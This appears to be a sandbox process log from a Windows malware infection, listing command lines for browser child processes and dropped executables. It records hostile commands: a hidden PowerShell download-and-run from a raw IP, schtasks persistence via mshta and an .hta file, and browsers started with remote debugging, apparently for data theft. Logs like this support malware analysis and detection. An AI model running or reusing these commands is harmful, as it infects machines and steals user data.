"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3348 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3496 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3360 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,14980132077644723851,5688950280841909888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=1948 /prefetch:2

C:\Users\Admin\AppData\Roaming\10000700100\feedlablest.exe

"C:\Users\Admin\AppData\Roaming\10000700100\feedlablest.exe"

C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8543046f8,0x7ff854304708,0x7ff854304718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2704 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10096480101\441ede6b27.exe

"C:\Users\Admin\AppData\Local\Temp\10096480101\441ede6b27.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2712 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2996 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2724 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn RqPYvmahlJo /tr "mshta C:\Users\Admin\AppData\Local\Temp\2kB7ed3sQ.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\2kB7ed3sQ.hta

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3224 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3860 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3216 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4316 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,2872578482394221539,2616040774415107412,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=1932 /prefetch:2

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn RqPYvmahlJo /tr "mshta C:\Users\Admin\AppData\Local\Temp\2kB7ed3sQ.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'C9AZU4WYL0MBXVPLLL3K9WWMEGYOTGDK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\2C27.tmp.exe

C:\Users\Admin\AppData\Local\Temp\2C27.tmp.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10096490121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Users\Admin\AppData\Local\Temp\WinTemp\Microsoft Edge Protect.exe

"C:\Users\Admin\AppData\Local\Temp\WinTemp\Microsoft Edge Protect.exe"

C:\Users\Admin\AppData\Local\TempC9AZU4WYL0MBXVPLLL3K9WWMEGYOTGDK.EXE

"C:\Users\Admin\AppData\Local\TempC9AZU4WYL0MBXVPLLL3K9WWMEGYOTGDK.EXE"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff85403cc40,0x7ff85403cc4c,0x7ff85403cc58

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2360,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2356 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1920,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2392 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1996,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2496 /prefetch:8

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\Temp\10096980101\bPDDW9F.exe

"C:\Users\Admin\AppData\Local\Temp\10096980101\bPDDW9F.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3188 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3216 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4580,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4512 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4684,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4712 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4488,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4540 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\WinTemp\Microsoft Edge Protect.exe

"C:\Users\Admin\AppData\Local\Temp\WinTemp\Microsoft Edge Protect.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3148,i,10074099709733532074,2359015470203702888,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4284 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\temp_22486.exe

"C:\Users\Admin\AppData\Local\Temp\temp_22486.exe"

C:\Users\Admin\AppData\Local\Temp\temp_22486.exe

"C:\Users\Admin\AppData\Local\Temp\temp_22486.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8543046f8,0x7ff854304708,0x7ff854304718

C:\Users\Admin\AppData\Local\Temp\temp_22506.exe

"C:\Users\Admin\AppData\Local\Temp\temp_22506.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2932 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3952 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2936 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4004 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2948 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,11537785689457988529,4691223600166373787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3020 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10096990101\z3SJkC5.exe

"C:\Users\Admin\AppData\Local\Temp\10096990101\z3SJkC5.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

